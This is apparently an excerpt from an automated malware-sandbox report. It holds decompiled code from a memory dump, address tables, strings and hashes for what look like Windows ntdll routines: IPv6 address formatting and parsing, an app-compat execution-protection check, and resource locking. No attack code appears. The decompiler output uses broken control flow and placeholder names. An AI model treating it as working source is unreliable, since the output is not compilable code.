				_t109 = _a8 + 0x2e;
				_v12 = 8;
				if( *_t133 != 0 ||  *((intOrPtr*)(_t133 + 2)) != 0 ||  *((intOrPtr*)(_t133 + 4)) != 0 ||  *((intOrPtr*)(_t133 + 6)) != 0 ||  *(_t133 + 0xc) == 0) {
					L17:
					_a4 = _t122;
					_v8 = _t122;
					_v16 = _t122;
					if(( *(_t133 + 8) & 0x0000fffd) == 0 &&  *(_t133 + 0xa) == 0xfe5e) {
						_v12 = 6;
					}
					_t127 = _v12;
					if(_t127 <= _t122) {
						L27:
						if(_a4 - _v8 <= 1) {
							_a4 = _t122;
							_v8 = _t122;
						}
						_t128 = 0;
						if(_v12 > _t122) {
							L33:
							L33:
							if(_v8 > _t128 || _t128 >= _a4) {
								if(_t128 != _t122 && _t128 != _a4) {
									_push(0x939c7e);
									_push(_t109 - _a8);
									_push(_a8);
									_t87 = E009E894A();
									_t134 = _t134 + 0xc;
									_a8 = _a8 + _t87;
								}
								_t84 = E009E894A(_a8, _t109 - _a8, 0x939c7a,  *(_t133 + _t128 * 2) & 0x0000ffff);
								_t134 = _t134 + 0x10;
								_a8 = _a8 + _t84;
							} else {
								_push(0x939c80);
								_push(_t109 - _a8);
								_push(_a8);
								_a8 = _a8 + E009E894A();
								_t134 = _t134 + 0xc;
								_t128 = _a4 - 1;
							}
							_t128 = _t128 + 1;
							if(_t128 < _v12) {
								goto L32;
							}
							goto L41;
							L32:
							_t122 = 0;
							goto L33;
						} else {
							L41:
							if(_v12 < 8) {
								_push( *(_t133 + 0xf) & 0x000000ff);
								_push( *(_t133 + 0xe) & 0x000000ff);
								_push( *(_t133 + 0xd) & 0x000000ff);
								_a8 = _a8 + E009E894A(_a8, _t109 - _a8, ":%u.%u.%u.%u",  *(_t133 + 0xc) & 0x000000ff);
							}
							return _a8;
						}
					} else {
						_t116 = 1;
						_t97 = _t133;
						_v20 = _t127;
						do {
							if( *_t97 != _t122) {
								_v16 = _t116;
							} else {
								if(_t116 - _v16 > _a4 - _v8) {
									_v8 = _v16;
									_a4 = _t116;
								}
								_t122 = 0;
							}
							_t97 = _t97 + 2;
							_t116 = _t116 + 1;
							_t40 =  &_v20;
							 *_t40 = _v20 - 1;
						} while ( *_t40 != 0);
						goto L27;
					}
				} else {
					_t126 =  *(_t133 + 8) & 0x0000ffff;
					if(_t126 != 0) {
						L13:
						if(_t126 != 0xffff ||  *(_t133 + 0xa) != 0) {
							_t122 = 0;
							goto L17;
						} else {
							_push( *(_t133 + 0xf) & 0x000000ff);
							_push( *(_t133 + 0xe) & 0x000000ff);
							_push( *(_t133 + 0xd) & 0x000000ff);
							_t104 = E009E894A(_a8, _t109 - _a8, "::ffff:0:%u.%u.%u.%u",  *(_t133 + 0xc) & 0x000000ff);
							L12:
							return _t104 + _a8;
						}
					}
					_t117 =  *(_t133 + 0xa) & 0x0000ffff;
					if(_t117 == 0) {
						L9:
						_t106 = 0x932926;
						L11:
						_push( *(_t133 + 0xf) & 0x000000ff);
						_push( *(_t133 + 0xe) & 0x000000ff);
						_push( *(_t133 + 0xd) & 0x000000ff);
						_push( *(_t133 + 0xc) & 0x000000ff);
						_t104 = E009E894A(_a8, _t109 - _a8, "::%hs%u.%u.%u.%u", _t106);
						goto L12;
					}
					if(_t117 != 0xffff) {
						goto L13;
					}
					if(_t117 != 0) {
						_t106 = 0x939cac;
						goto L11;
					}
					goto L9;
				}
			}

0x009d3b9b
0x009d3b9e
0x009d3ba0
0x009d3ba4
0x009d3bae
0x009d3c74
0x009d3c79
0x009d3c7c
0x009d3c7f
0x009d3c86
0x009d3c93
0x009d3c93
0x009d3c9a
0x009d3c9f
0x009d3cd0
0x009d3cd9
0x009d3cdb
0x009d3cde
0x009d3cde
0x009d3ce1
0x009d3ce6
0x00000000
0x009d3cf1
0x009d3cf4
0x009d3d1c
0x009d3d28
0x009d3d2d
0x009d3d2e
0x009d3d31
0x009d3d36
0x009d3d39
0x009d3d39
0x009d3d56
0x009d3d5b
0x009d3d5e
0x009d3cfb
0x009d3d00
0x009d3d05
0x009d3d06
0x009d3d11
0x009d3d14
0x009d3d17
0x009d3d17
0x009d3d61
0x009d3d65
0x00000000
0x00000000
0x00000000
0x009d3cef
0x009d3cef
0x00000000
0x009d3ce8
0x009d3d67
0x009d3d6b
0x009d3d74
0x009d3d79
0x009d3d7e
0x009d3d95
0x009d3d95
0x00000000
0x009d3d98
0x009d3ca1
0x009d3ca3
0x009d3ca4
0x009d3ca6
0x009d3ca9
0x009d3cac
0x009d3cea
0x009d3cae
0x009d3cbb
0x009d3cc0
0x009d3cc3
0x009d3cc3
0x009d3cc6
0x009d3cc6
0x009d3cc9
0x009d3cca
0x009d3ccb
0x009d3ccb
0x009d3ccb
0x00000000
0x009d3ca9
0x009d3bdc
0x009d3bdc
0x009d3be8
0x009d3c3c
0x009d3c3f
0x009d3c72
0x00000000
0x009d3c48
0x009d3c4f
0x009d3c54
0x009d3c59
0x009d3c68
0x009d3c34
0x00000000
0x009d3c34
0x009d3c3f
0x009d3bea
0x009d3bf1
0x009d3bff
0x009d3bff
0x009d3c0b
0x009d3c12
0x009d3c17
0x009d3c1c
0x009d3c21
0x009d3c2c
0x00000000
0x009d3c31
0x009d3bf8
0x00000000
0x00000000
0x009d3bfd
0x009d3c06
0x00000000
0x009d3c06
0x00000000
0x009d3bfd

APIs

___swprintf_l.LIBCMT ref: 009D3C2C
___swprintf_l.LIBCMT ref: 009D3C68
___swprintf_l.LIBCMT ref: 009D3D09
___swprintf_l.LIBCMT ref: 009D3D31
___swprintf_l.LIBCMT ref: 009D3D56
___swprintf_l.LIBCMT ref: 009D3D8D

Strings

ffff:, xrefs: 009D3C06, 009D3C22
:%u.%u.%u.%u, xrefs: 009D3D84
::ffff:0:%u.%u.%u.%u, xrefs: 009D3C5F
::%hs%u.%u.%u.%u, xrefs: 009D3C23

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 1879c309f3cda6204c1feb2dbc1e1022762c416aba0384ef17459b961f7e90f6
Instruction ID: 54af7d31cffa6f19e3c6c677f85181cf57088295e3fb3908c4234d6aa2b620cc
Opcode Fuzzy Hash: 1879c309f3cda6204c1feb2dbc1e1022762c416aba0384ef17459b961f7e90f6
Instruction Fuzzy Hash: 9B61E5B6940248ABCB20CFA9C84057E7BF9EF94312B14C52AFCED97241D274DF408B51

Uniqueness

Uniqueness Score: -1.00%

Function 00967EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00967EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xa12088; // 0x7764bdd0
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00967F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00983F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0093DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xa14218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00983F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00940D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00983F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00948375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00983F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E009AE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00983F92();
					_t38 = 1;
					L2:
					return E0093E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x00967f08
0x00967f0f
0x00967f12
0x00967f1b
0x00967f31
0x00983ead
0x00983eb4
0x00000000
0x00000000
0x00983eba
0x00983ecd
0x00983ed2
0x00983ee1
0x00983ee7
0x00983eec
0x00983f12
0x00983f18
0x00983f1a
0x00000000
0x00000000
0x00983f20
0x00983f26
0x00983f28
0x00000000
0x00000000
0x00983f2e
0x00983f30
0x00000000
0x00000000
0x00983f3a
0x00983f3b
0x00983f53
0x00983f64
0x00983f69
0x00983f6c
0x00983f6d
0x00983f6f
0x0098e304
0x0098e30f
0x0098e315
0x0098e31e
0x0098e321
0x0098e327
0x0098e329
0x00000000
0x00000000
0x00000000
0x00000000
0x0098e32f
0x0098e32f
0x0098e337
0x0098e33a
0x0098e33b
0x0098e33d
0x0098e33f
0x0098e341
0x0098e341
0x0098e34e
0x0098e353
0x0098e358
0x0098e35d
0x0098e35f
0x00000000
0x00000000
0x0098e365
0x0098e365
0x0098e368
0x0098e36e
0x00000000
0x00000000
0x0098e374
0x0098e32f
0x00983f75
0x00983f7a
0x00983f7c
0x00983f7e
0x00983f86
0x00967f39
0x00967f47
0x00967f47
0x00967f37
0x00967f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00983F12

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00983F75
CLIENT(ntdll): Processing section info %ws..., xrefs: 0098E345
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0098E2FB
Execute=1, xrefs: 00983F5E
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00983F4A
ExecuteOptions, xrefs: 00983F04
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00983EC4

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 7b00c1aa57af5012105548b5b38190ef2b803ae2532d4523512bda51ed73c172
Instruction ID: c7e9be4cd44eeb395e7d26bec662cb4e614e4e2da2ddd9c7aa8d0258f2a37e0e
Opcode Fuzzy Hash: 7b00c1aa57af5012105548b5b38190ef2b803ae2532d4523512bda51ed73c172
Instruction Fuzzy Hash: 7541AC71A4021DBBDF20EF94DCC6FDAB3BCAB54714F004599F605E6181EA709B458FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00970B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00970B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00948980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0093DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00970CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00970CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E009706BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E009706BA(_t135, _t178) == 0 || E00970A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00970CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00970CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E009706BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E009706BA(_t124, _t142) == 0 || E00970A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x00970b21
0x00970b24
0x00970b27
0x00970b2a
0x00970b2d
0x00970b30
0x00970b33
0x00970b36
0x00970b39
0x00970b3e
0x00970c65
0x00970c68
0x00970c6a
0x00970c6f
0x0099eb42
0x00000000
0x00000000
0x0099eb48
0x0099eb48
0x00970c75
0x00970c7a
0x0099eb54
0x00000000
0x00000000
0x00000000
0x0099eb5a
0x00970c80
0x00970c84
0x0099eb98
0x00000000
0x00000000
0x0099eba6
0x00970cb8
0x00970cba
0x00970cd3
0x00970cda
0x00970ce4
0x00970ce9
0x00000000
0x00970cec
0x00970c8c
0x0099eb63
0x00000000
0x00000000
0x0099eb70
0x0099eb75
0x0099eb7d
0x00000000
0x00000000
0x0099eb8c
0x00000000
0x0099eb8c
0x00970c96
0x00000000
0x00000000
0x00970ca2
0x00970cac
0x00970cb4
0x00000000
0x00000000
0x00970b44
0x00970b47
0x00970b49
0x00000000
0x00000000
0x00970b4f
0x00970b50
0x00000000
0x00000000
0x00970b56
0x00970b62
0x00970b7c
0x00970bac
0x00970a0f
0x0099eaaa
0x00000000
0x0099eac4
0x0099eac4
0x00970bd0
0x00970bd0
0x00970bd4
0x00970bd9
0x00000000
0x00000000
0x00970bdb
0x00970be0
0x0099eb0e
0x00970a1a
0x00000000
0x00970a1a
0x0099eb1a
0x0099eb1f
0x0099eb27
0x00000000
0x00000000
0x0099eb36
0x00000000
0x0099eb36
0x00970bea
0x00000000
0x00000000
0x00970bf6
0x00970c00
0x00970c03
0x00970c0b
0x00000000
0x00970c0b
0x0099eaaa
0x00000000
0x00970a15
0x00970bb6
0x00000000
0x00970bc6
0x00970bc6
0x00970bcb
0x00970c15
0x00000000
0x00000000
0x00970c1d
0x00970c20
0x00970c21
0x00970c24
0x00970c24
0x00970c26
0x00000000
0x00970c26
0x00970bcd
0x00000000
0x00970bcd
0x00970b89
0x00970b89
0x00970b90
0x00000000
0x00000000
0x00970b96
0x00000000
0x00970b96
0x00970a04
0x00970a04
0x00970b9a
0x00970b9a
0x00970b9b
0x00970b9f
0x00000000
0x00000000
0x00000000
0x00970ba5
0x00970ac7
0x00970aca
0x0099eacf
0x00000000
0x0099eade
0x0099eade
0x0099eae3
0x00000000
0x00000000
0x0099eaf3
0x0099eaf6
0x0099eaf7
0x0099eafe
0x0099eb01
0x00000000
0x0099eb01
0x0099eacf
0x00970ad0
0x00970ad4
0x00000000
0x00000000
0x00970ada
0x00970ae6
0x00970c34
0x00000000
0x00970c47
0x00970c49
0x00970c4a
0x00970c4e
0x00970c51
0x00970c54
0x00970c57
0x00970c5a
0x00000000
0x00000000
0x00000000
0x00970c60
0x00970afb
0x00970afe
0x00970b02
0x00970b05
0x00970b08
0x00000000
0x00970b08
0x00970ae6
0x00970b44
0x009709f8
0x009709f8
0x009709f9
0x00000000
0x00000000
0x0099eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 00970BF6
__fassign.LIBCMT ref: 00970CA2

Strings

:, xrefs: 00970BA9
:, xrefs: 00970AC7
., xrefs: 00970A0C

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: 534b7a97c0e17d15bb31d3d62fc6423f2bf39ba7106765f044797f4d31d8b8a2
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 1DA18D72D0030AEFDF25CF68C8457BEB7B8AF95305F28C56AD88AA7241D7349A41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00970554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00970554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a101c0;
									_push(_t144);
									_push(0);
									_t51 = E0092F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00974FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00983F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00983F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E009B217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00983F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00973915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a101c0;
												_push(_t138);
												_push(0);
												_t58 = E0092F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00974FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00983F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00983F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E009B217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00983F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00973915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00955384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0092F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00973915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0092F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00973915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0092F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00973915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00955329(_t110, _t138);
																_t69 = E009553A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
